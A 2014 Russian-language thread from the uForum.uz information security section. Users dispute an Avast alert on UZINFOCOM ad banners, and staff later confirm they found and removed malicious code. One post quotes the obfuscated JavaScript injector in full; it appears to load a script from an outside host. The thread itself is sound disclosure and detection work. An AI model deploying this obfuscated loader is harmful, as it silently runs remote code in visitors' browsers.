Моё меню Общее меню Пользователи Правила форума Все прочитано
Вернуться   uForum.uz > ИКТ и телеком > Информационная безопасность
Знаете ли Вы, что ...
...до того как открыть новую тему, стоит использовать поиск: такая тема уже может существовать.
<< Предыдущий совет - Случайный совет - Следующий совет >>

Информационная безопасность Вопросы по защите информации и данных в сетях телекоммуникаций


Ответить

 
Опции темы Опции просмотра
Старый 31.01.2014 13:10   #261  
Аватар для Eldar Ishimbaev
Оффлайн
Сообщений: 4,884
+ 433  2,393/1,396
– 12  37/21

Uzbekistan
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Ответить 
Старый 31.01.2014 18:08   #262  
Real ID Group
Аватар для Иванов Михаил
Оффлайн
ivanov.uz
freelancer
Сообщений: 307
+ 192  158/83
– 8  7/3

UzbekistanАккаунт на TwitterFacebook
Цитата:
Сообщение от Eldar Ishimbaev Посмотреть сообщение
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером ?

Цитата:
<script>try{$_=~[];$_={___:++$_,$$$$![]+"")[$_],__$:++$_,$_$_![]+"")[$_],_$_:++$_,$_$${}+"")[$_],$$_$$_[$_]+"")[$_],_$$:++$_,$$$_!""+"")[$_],$__:++$_,$_$:++$_,$$__{}+"")[$_],$$_:++$_,$$$:++$_,$___:++$_,$__$:++$_};$_.$_=($_. $_=$_+"")[$_.$_$]+($_._$=$_.$_[$_.__$])+($_.$$=($_.$+"")[$_.__$])+((!$_)+"")[$_._$$]+($_.__=$_.$_[$_.$$_])+($_.$=(!""+"")[$_.__$])+($_._=(!""+"")[$_._$_])+$_.$_[$_.$_$]+$_.__+$_._$+$_.$;$_.$$=$_.$+(!""+"")[$_._$$]+$_.__+$_._+$_.$+$_.$$;$_.$=($_.___)[$_.$_][$_.$_];$_.$($_.$($_.$$+"\""+$_.$$_$+"="+$_.$$_$+$_._$+$_ .$$__+$_._+"\\"+$_.__$+$_.$_$+$_.$_$+$_.$$$_+"\\"+ $_.__$+$_.$_$+$_.$$_+$_.__+";"+$_._+$_.$_$_+"=\\"+ $_.__$+$_.$_$+$_.$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_ .$$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$__+ $_.$$$+$_.$_$_+$_.__+$_._$+"\\"+$_.__$+$_.$$_+$_._ $_+"."+$_._+"\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+"\\" +$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.___+$_.__$+"\ \"+$_.__$+$_.$__+$_.$$$+$_.$$$_+"\\"+$_.__$+$_.$_$ +$_.$$_+$_.__+";\\"+$_.__$+$_.$_$+$_.__$+$_.$$$$+" ("+$_.$$_$+"._\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$ +$_.$$$+$_.___+"==="+$_._+"\\"+$_.__$+$_.$_$+$_.$$ _+$_.$$_$+$_.$$$_+$_.$$$$+"\\"+$_.__$+$_.$_$+$_.__ $+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$_+$_.$$_$+"\\"+$ _.$__+$_.___+"&&\\"+$_.$__+$_.___+$_.$$_$+"."+$_.$ $__+$_._$+$_._$+"\\"+$_.__$+$_.$_$+$_._$$+"\\"+$_. __$+$_.$_$+$_.__$+$_.$$$_+".\\"+$_.__$+$_.$$_+$_._ $$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$ __+"\\"+$_.__$+$_.$_$+$_.___+"('_"+$_._+$_.__+"\\" +$_.__$+$_.$_$+$_.$_$+$_._+$_.$$_$+"=')==-"+$_.__$+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$ _._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_. $_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$ +$_.$_$+$_.___+"('\\"+$_.__$+$_._$_+$_.$$$+"\\"+$_ .__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$ _$+$_._$+"\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$+$_. $$_+$_._$$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+$ _.$$_+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.$__+$_.___ +"')>"+$_.___+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_. ___+$_._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$ _+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$ _.__$+$_.$_$+$_.___+"('\\"+$_.__$+$_.__$+$_.$_$+"\ \"+$_.__$+$_._$_+$_._$$+"\\"+$_.__$+$_.__$+$_.__$+ "\\"+$_.__$+$_.___+$_.$_$+"\\"+$_.$__+$_.___+"')>" +$_.___+")\\"+$_.$__+$_.___+"{"+$_.$$_$+"._\\"+$_. __$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$$$+$_.___+"="+$_ .__$+";"+$_.$$_$+"."+$_.$$__+$_._$+$_._$+"\\"+$_._ _$+$_.$_$+$_._$$+"\\"+$_.__$+$_.$_$+$_.__$+$_.$$$_ +"='__"+$_._+$_.__+"\\"+$_.__$+$_.$_$+$_.$_$+$_._+ $_.$$_$+"="+$_.__$+";\\"+$_.$__+$_.___+$_.$$$_+"\\ "+$_.__$+$_.$$$+$_.___+"\\"+$_.__$+$_.$$_+$_.___+" \\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_._$_ +$_.$$$_+"\\"+$_.__$+$_.$$_+$_._$$+"=\\"+$_.__$+$_ ._$_+$_.$$$+$_.$$$_+$_.$$_$+",\\"+$_.$__+$_.___+$_ .___+$_.__$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+ $_._$_+$_.$_$_+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.$ __+$_.___+$_._$_+$_.___+$_._$_+$_.___+"\\"+$_.$__+ $_.___+$_.___+$_.___+":"+$_.___+$_.___+":"+$_.___+ $_.___+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_._$_+$_.$_ $+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.__$+$_.___+$_. _$$+";\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_.___+ $_.$_$_+$_.__+"\\"+$_.__$+$_.$_$+$_.___+"=/';"+$_.$$_$+".\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$ +$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+$_.__+$_. $$$_+(![]+"")[$_._$_]+"\\"+$_.__$+$_.$_$+$_.$$_+"(\\\"<\\"+$_.__$+$_.$$ _+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$_+$_._$_+"\\\"+\ \\"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_. ___+$_.__+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_ ._$$+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"='\\"+$_._ _$+$_.$_$+$_.___+$_.__+$_.__+"\\"+$_.__$+$_.$$_+$_ .___+"://"+$_.$_$$+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_ .$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.__$+ $_.$$_+$_._$$+"."+$_.$_$$+"\\"+$_.__$+$_.$_$+$_.__ $+"\\"+$_.__$+$_.$$$+$_._$_+"/"+$_.$_$+$_.$_$$+$_.$_$$+$_.$_$$+$_.___+$_.$$$_+$_ ._$_+$_.__$+".\\"+$_.__$+$_.$_$+$_._$_+"\\"+$_.__$ +$_.$$_+$_._$$+"?"+$_.$$__+"\\"+$_.__$+$_.$$_+$_._ __+"="+$_.$_$_+$_.$$_$+"\\"+$_.__$+$_.$$_+$_.$$_+" ."+$_._+"\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$ _$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$$+$_._$+ $_.$$__+$_._$+"\\"+$_.__$+$_.$_$+$_.$_$+"."+$_._+" \\"+$_.__$+$_.$$$+$_._$_+"'></\\"+$_.__$+$_.$$_+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$ _+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\\"+\\\"\\"+$ _.__$+$_.$$_+$_.___+$_.__+">\\\");}"+"\"")())();}c atch(e){}</script>
Изображения
Тип файла: jpg 123.JPG (117.6 Кб, 84 просмотров)
__________________
beZOOM.uz Будь в курсе IT-новостей\//\ Я весь тут ivanov.uz
Ответить 
2 "+" от:
Старый 31.01.2014 18:53   #263  
Аватар для Котофей
Оффлайн
Сообщений: 1,130
+ 214  486/271
– 8  47/34

Honduras
Цитата:
Сообщение от Иванов Михаил Посмотреть сообщение
с регулярными выражениями
Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/
Ответить 
Старый 31.01.2014 19:10   #264  
Real ID Group
Аватар для Иванов Михаил
Оффлайн
ivanov.uz
freelancer
Сообщений: 307
+ 192  158/83
– 8  7/3

UzbekistanАккаунт на TwitterFacebook
Цитата:
Сообщение от Котофей Посмотреть сообщение
Цитата:
Сообщение от Иванов Михаил Посмотреть сообщение
с регулярными выражениями
Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/
Я на столько не разбираюсь в js/ А как его декомпилировать или расшифровать? Возможно это и не "вирус", но часто именно к скрытию кода прибегают создатели вирусов.
UPD вот похожий код http://www.linux.org.ru/forum/web-development/5547798
__________________
beZOOM.uz Будь в курсе IT-новостей\//\ Я весь тут ivanov.uz

Последний раз редактировалось Иванов Михаил; 31.01.2014 в 19:15.
Ответить 
Старый 31.01.2014 19:28   #265  
Аватар для Ramil Ziganshin
Оффлайн
UZINFOCOM
Специалист группы веб дизайна РЦС ZiyoNET
Сообщений: 327
+ 22  158/106
– 0  2/2

UzbekistanОтправить сообщение для Ramil Ziganshin с помощью Skype™
Цитата:
Сообщение от Иванов Михаил Посмотреть сообщение
Цитата:
Сообщение от Eldar Ishimbaev Посмотреть сообщение
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером ?
Ведем анализ. По результатам отпишемся.
__________________
Попытаться исправить можно все
Ответить 
Старый 31.01.2014 19:50   #266  
Real ID Group
Аватар для Иванов Михаил
Оффлайн
ivanov.uz
freelancer
Сообщений: 307
+ 192  158/83
– 8  7/3

UzbekistanАккаунт на TwitterFacebook
Цитата:
Сообщение от Eldar Ishimbaev Посмотреть сообщение
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Цитата:
Сообщение от Ramil Ziganshin Посмотреть сообщение
Ведем анализ. По результатам отпишемся.
Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало заражение на своем сайте. А "заражение" присутствовало.
__________________
beZOOM.uz Будь в курсе IT-новостей\//\ Я весь тут ivanov.uz
Ответить 
Реклама и уведомления
Старый 31.01.2014 20:22   #267  
Аватар для Ramil Ziganshin
Оффлайн
UZINFOCOM
Специалист группы веб дизайна РЦС ZiyoNET
Сообщений: 327
+ 22  158/106
– 0  2/2

UzbekistanОтправить сообщение для Ramil Ziganshin с помощью Skype™
Цитата:
Сообщение от Иванов Михаил Посмотреть сообщение
Цитата:
Сообщение от Eldar Ishimbaev Посмотреть сообщение
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Цитата:
Сообщение от Ramil Ziganshin Посмотреть сообщение
Ведем анализ. По результатам отпишемся.
Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало заражение на своем сайте. А "заражение" присутствовало.
Нашли вредоносный код. Удалили.
__________________
Попытаться исправить можно все
Ответить 
Старый 31.01.2014 20:26   #268  
Аватар для Ramil Ziganshin
Оффлайн
UZINFOCOM
Специалист группы веб дизайна РЦС ZiyoNET
Сообщений: 327
+ 22  158/106
– 0  2/2

UzbekistanОтправить сообщение для Ramil Ziganshin с помощью Skype™
Цитата:
Сообщение от Иванов Михаил Посмотреть сообщение
Цитата:
Сообщение от Eldar Ishimbaev Посмотреть сообщение
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером ?
Спасибо за сообщение. Проведем ревизию, усилим защиту.
__________________
Попытаться исправить можно все
Ответить 
"+" от:
Старый 31.01.2014 21:29   #269  
Заблокирован(а)
Аватар для ratheon
Оффлайн
Свиноферма
нанотехнолог
Сообщений: 672
+ 1  216/160
– 0  100/60

Uzbekistan
Цитата:
Сообщение от Ramil Ziganshin Посмотреть сообщение
Спасибо за сообщение. Проведем ревизию, усилим защиту.
о реакции антивирусов на ваши рекламные баннеры уже писали полтора месяц назад, видимо "доходит" не с первого раза
Ответить 
Старый 31.01.2014 21:37   #270  
Аватар для Anvar Atakhanov
Оффлайн
AKA:3Dman
Сообщений: 1,556
+ 1,993  1,466/628
– 253  99/50

Uzbekistan
Полцарства тому кто устранить эту проблему:


Задолбал уже
Ответить 
Ответить
Опции темы
Опции просмотра




Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
OOO «Единый интегратор UZINFOCOM»


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх